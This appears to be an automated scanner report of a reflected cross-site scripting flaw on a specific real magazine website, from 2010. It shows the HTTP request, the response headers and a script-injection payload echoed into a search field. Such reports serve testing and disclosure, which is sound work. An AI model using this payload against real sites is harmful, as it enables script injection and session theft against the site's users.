1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.treasurya |
Path: | /Issues/2010/October-2010 |
GET /Issues/2010/October-2010 Host: www.treasuryandrisk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: private, max-age=0 Content-Length: 231344 Content-Type: text/html; charset=utf-8 Expires: Sat, 06 Nov 2010 20:34:59 GMT Last-Modified: Sun, 21 Nov 2010 21:34:59 GMT Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: .ASPXAUTH=96C687AF75 Set-Cookie: ASP.NET_SessionId X-Powered-By: ASP.NET Date: Sun, 21 Nov 2010 21:34:59 GMT Connection: close <html __expr-val-dir="ltr" dir="ltr"> <head><link rel="SHORTCUT ICON" href="http://www ...[SNIP]... <input name='SearchTerms' id='SearchTerms' value='Deloitte2a931'><script>alert(1)< ...[SNIP]... |